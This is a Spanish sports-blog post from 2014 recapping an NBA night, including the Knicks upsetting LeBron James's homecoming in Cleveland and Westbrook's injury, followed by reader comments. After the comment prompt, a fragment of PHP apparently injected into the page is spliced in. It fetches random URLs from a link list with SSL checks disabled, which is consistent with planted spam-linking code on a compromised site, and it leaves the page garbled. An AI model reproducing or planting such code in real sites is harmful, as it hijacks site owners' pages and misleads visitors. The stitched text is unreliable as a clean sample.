La crónica (30/10/2014): El aguafiestas del Rey

31 de October de 2014 por Sancho88

Suena el piano de una canción melancólica que anuncia la vuelta a casa del hijo pródigo, y el ‘speaker’ del Quickens Loans Arena recibe con una voz ahogada y ruda a ‘El Elegido’, al chico del barrio, al chavalín del instituto San Vicente y Santa María, de los míticos Fighting Irish. Los polvos de magnesia vuelven a inundar a su parroquia como un incienso redentor. En algún lugar del purgatorio de Ohio están aún las miles de camisetas que quemaron esta gente en 2010. Pero la Santa Compaña de Cleveland perdonó a su héroe, y el héroe volvió a casa, como reza la canción. Saludó a todo el mundo, y se fundió en un abrazo de sincera amistad con su amigo Carmelo Anthony. En la banquillo ya no se forman las ‘raves’ nocturnas y callejeras de antaño. No pone la música Jamario Moon, Ilgauskas no es el colega solitario que se aferra con su cerveza a la barra, y las amenazas desde fuera no se llaman Danny Gibson y Mo Williams. Ahora la cosa es más señorial, como en el Palacio de Versalles o algo así. ¿Que qué tal pintó todo aquello? Pschee… estuvo bien. En el blog teníamos pase VIP, por supuesto, para la ceremonia de coronación. En el cuño oficial de la carta que nos envió Dan Gilbert ponía expresamente: “Por cortesía del encantador Francisco Nicolás”. No sabemos quién será ese tío, pero nos colamos en la fiesta igualmente.

Y la fiesta acabó inesperadamente (95-90). Los Knicks de Phil, de Fisher, de Carmelo y del “Uy, ya verás qué batacazo se van a pegar los Knicks esta temporada”, himno indivisible de la franquicia desde los años 70, dieron la sorpresa y se cargaron contra todo pronóstico a los fieros ‘Cavs’. Quizá faltó el espíritu y LeBron se encontró demasiado solo en su fiesta. Quizá ya no fueron suficientes los gritos desesperados de Gloria desde la banda. ‘Mamá, déjame en paz que no me concentro’. Y es que, cerca de cumplir los 30, a LeBron todavía le quedan muchas lecciones que aprender de la vida. Y una de ellas se la dio ayer Carmelo Anthony. El de Syracuse se consagró con JR Smith, Iman Shumpert y el sorprendente Quincy Acy para pegar el ‘hachazo’ definitivo en el último cuarto, donde Melo fue autor de 9 puntos. LeBron pagó los nervios de la presentación y jugó en unos porcentajes que no son los suyos (5/15) y perdió unas posesiones que tampoco forman parte de su enormidad: 8 pérdidas, 4 de ellas en el último cuarto. Ante este panorama de poco sirvió la ayuda del resto del quinteto, donde nadie bajó de los 10 puntos. Pero al Rey le pudo la melancolía anoche. Era su fiesta, sí, pero había demasiados recuerdos que olvidar. El jarro de agua fría pasará y los Cavaliers recuperarán todo su esplendor, pero anoche el Pequeño Nicolás se hizo la foto con los Knicks. ¡Menudo chaquetero!

THUNDER 90 – CLIPPERS 93

En Los Ángeles por fin se estrenó el casillero local de victorias, pero no, efectivamente, no fue gracias a los Lakers. Fueron los Clippers del multimillonario Steve Ballmer. Y es que entre Chris Paul, Blake Griffin y Jamaal Crawford se merendaron a los castigados Thunder con 61 puntos entre los tres (90-93). Anoche hubo una nueva víctima en los azules. Nada menos que Russell Westbrook, el único eslabón importante que quedaba sano aparte de Ibaka. El base chocó en un rebote con Kendrick Perkins y se fracturó el dedo índice de su mano derecha. Los Thunder ya han solicitado a la liga que se aplique la norma de los 4 lesionados durante más de 3 partidos. Esta norma permite fichar un jugador más para poder afrontar los partidos con una mínima garantía. Sin Westbrook solo tienen 8 jugadores sanos en OKC, y algunos de ellos se llaman Sebastian Telfair, Lance Thomas y Kendrick Perkins. No compensa competir así. Si esto fuera la liga española darían ganas de repetir el mítico ‘plantón’ en Copa del Rey del Barsa al Atleti. Con Perkins a la cabeza… Dantesco. Solo hubo motivos de esperanza anoche de la mano de Perry Jones III, aquel jugador que lleva 3 años esperando que le den un poco de cancha. Ayer lo consiguió y cuajó el mejor partido de su vida. Estará en los mayores esfuerzos en vano de la jornada. A pesar de todo los Thunder tuvieron un triple desesperado de Ibaka para forzar la prórroga. Van a continuar en la batalla a pesar de los pesares.

PISTONS 91 – T’WOLVES 97

En Minnesota los jóvenes lobeznos la liaron contra los Pistons (91-97). Regresó a las canchas Kevin Martin, que aportó 12 puntos desde el banquillo y complementó el buen hacer de Pekovic y Thaddeus Young. Volvió a estar muy flojito ‘El Mesías’ Wiggins, que a este paso se va a hundir en el ‘Arca de Noé’. En los Pistons Van Gundy ya señala a su ‘cabeza de turco’ Brandon Jennings. Jugó poquísimo como en el primer partido y aportó poquísimo también. DJ Augustin es el base de SVG y Jennings tendrá que ponerse las pilas si quiere jugar con este entrenador, al que no le gustan las tonterías. El díscolo base estuvo en cancha siempre más pendiente de dar empujones a Ricky Rubio que de jugar al baloncesto. Muy gris la primera unidad de los Pistons y solo cumplieron Augustin y Caron Butler desde el banquillo. Pinta otro añito complicado en ‘Motown’.

JAZZ 102 – MAVS 120

Para terminar la jornada, los Mavericks no tuvieron ningún problema contra los Jazz (102-120), y de la mano de los inspirados Nowitzki y Chandler Parsons sentenciaron el partido en la primera mitad (44-69).

WIZARDS 105 – MAGIC 98

Y en el partido que abría la jornada, los Wizards se deshicieron de los bisoños Magic con una actuación mitológica de John Wall, al que nadie podrá cantar aquello de ‘Overated’. El chaval firmó la mejor actuación de la noche con un 30-5-12. Ya enchufa hasta los triples. Estuvo bien comandado por el doble-doble del ‘cherokee’ polaco Marcin Gortat (20-12). En los Magic funcionó Vucevic y dos tiradores que venían a parchear el lamentable juego exterior del equipo: Evan Fournier y Ben Gordon. Anoche lo consiguieron, pero no fue ni de lejos suficiente. Van a pasar un año difícil en Orlando.

Premios

wallMVP: No tuvo piedad John Wall anoche ante Elfrid Payton, al que dio un cursillo rápido de lo que supone ser un base estrella en la NBA. 30 puntos, 12 asistencias, 5 rebotes, 2 robos para el líder de los Wizards, que amargó la noche al novato en los dos lados de la pista.

Rookie: Ante la poca competencia por parte de sus compañeros de generación, entregamos el premio al mejor novato del día a Andrew Wiggins pese a que su aportación fue de solo 8 puntos y 4 rebotes.

Sorpresa: La gran sorpresa de la noche fue, sin lugar a dudas, la victoria de los Knicks en el Quickens Loans. Por lo que respecta a actuaciones individuales, destacamos a dos parejas: Caron Butler y DJ Augustin, que lograron 44 puntos 11 rebotes y 6 asistencias para Detroit, y Brandan Wright y Aminu, autores de 30 puntos con 12/14 en tiros de campo. Lo de Perry Jones y su 32-7-3, más que sorpresa, es cuestión de matemáticas, y es que alguien tiene que anotar en los Thunder sin Durant, Westbrook ni Reggie Jackson.

Decepción: Vaya panorama se le empieza a presentar a Brandon Jennings bajo la dirección de Stan Van Gundy. Anoche 4 puntos y 6 asistencias, y lo que es más preocupante, solo 16 minutos de juego. Pero la decepción con mayúsculas se vivió en Cleveland, donde la fiesta acabó en derrota y, en buena medida, a causa de una paupérrima actuación de LeBron James, nervioso y errático en su vuelta a casa: 17 puntos, 5 rebotes y 4 asistencias con 5 de 15 en tiros y 8 pérdidas.

Mayor esfuerzo en vano: Va a ser un fijo en esta sección Nikola Vucevic, que logró anoche 23 puntos, 12 rebotes y 3 asistencias en la derrota ante Wizards. Hoy le dejamos que le acompañen dos compañeros, Evan Fournier y Ben Gordon, que contribuyeron con 43 puntos y 15 de 22 en tiros. También cumplieron con creces pese a la derrota Kevin Love (19-14-4) y Kyrie Irving (22-5-7).

Comenta

12 comentarios a esta entrada

  1. Denise dice:
    #1

    Jajaja Fco Nicolas, Jamario Moon y su musica, la madre de Lebron, que gran cronica, ademas de conocer como ha ido la jornada, unas risas nos pegamos

      Citar

  2. Nacho dice:
    #2

    Denise:
    Jajaja Fco Nicolas, Jamario Moon y su musica, la madre de Lebron, que gran cronica, ademas de conocer como ha ido la jornada, unas risas nos pegamos

    jejeje. +1

    ¿Y viste a Fournier? Aparte de guapo, la sota de oros las sabe meter. Jajaja

      Citar

  3. Sancho88 dice:
    #3

    Fournier, el amigo de los niños y de Denise, jejeje

      Citar

  4. MagicJohnson32 dice:
    #4

    Cómo se te va la pinza, Sancho, me encanta…

    Palmaron los Cavs, pero aun así asusta lo que puede aportar Love en este equipo. Algunas de sus especialidades, como los corner threes o los pases largos tras rebote defensivo, son sencillamente perfectas para jugar junto a James e Irving.

      Citar

  5. Denise dice:
    #5

    Jaja con el as de bastos les daba yo a los directivos de los Magic para espabilarlos. A Vaughn mas que a ninguno. Otra cosa, el apodo Mesias no es cosa de Marca o es el mote de verdad?

      Citar

  6. jhc dice:
    #6

    sorpreson de los Knicks despues jugaran contra Phila y perderan… es la misma historia una y otra vez xD

      Citar

  7. Vader dice:
    #7

    Buen partido de los Knicks, que este año todos sabemos que van a sufrir pero que por lo menos ahora intentan jugar como un equipo. Ayer 30 asistencias, 6 de Melo, 7 de JR Smith, ver para creer. Muy bien Jason Smith con su tirito de media distancia y Acy en la intendencia. Cuando el que toma las decisiones es inteligente y ficha bien los equipos mejoran, ni más ni menos. Asusta pensar en lo que puede montar Phil el próximo verano como Marc Gasol decida subirse al barco.

    Y hablando del partido de ayer se me confirma una sospecha que ya tenia en verano. A estos Cavs les hace falta trabajar su defensa, a diferencia del Miami del big 3 se les ve demasiado blandos atras. Esta noche contra Chicago saldran motivados a conseguir la primera victoria pero lo pueden pasar muy mal contra el equipo de Rose & Co.

    Saludos!!

      Citar

  8. portu dice:
    #8

    Grande Sancho!!!

      Citar

  9. Denise dice:
    #9

    42 millonazos para Alec Burks en su renovación por los Jazz. El chico es joven y tiene potencial, pero se me antoja una barbaridad para lo que ha demostrado hasta el momento.

      Citar

  10. HisRoyalAirness dice:
    #10

    Denise:
    42 millonazos para AlecBurks en su renovación por los Jazz. El chico es joven y tiene potencial, pero se me antoja una barbaridad para lo que ha demostrado hasta el momento.

    Luego os sorprendéis de lo que pide Ricky…
    Creo que de los Cavs no se puede hablar aún mucho. La única pega fue que Love estaba a tope y, como Lebron y Kyrie tenían que unirse a la fiesta, empezaron a sobar bola y tirarlo todo, dejándole sólo tiros forzados. Será pulir los detalles y poco más pero esta madrugada les toca bailar con la más fea

      Citar

  11. Denise dice:
    #11

    Bueno, y Klay Thompson 70 millones por 4 años, dicho de otra forma, 17,5 millones por año ¿pero esto que es?? ¿Estos contratazos sobrepagados a lo bestia está relacionado con eso del nuevo contrato televisivo? Imagino que aumentarán los limites salariales, porque si no, carece de sentido.

      Citar

  12. Azabel dice:
    #12

    Denise: bestia está relacionado con eso del nuevo contrato televisivo? I

    no lo veo sobrepagado de ninguna manera, Thompson no promedia 23 o 24 puntos por partido por que esta rodeado de grandes jugadores y con opciones de tiro algo limitadas, pero en un equipo donde se tire lo que quiera y sea lider, se da un empacho de puntos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>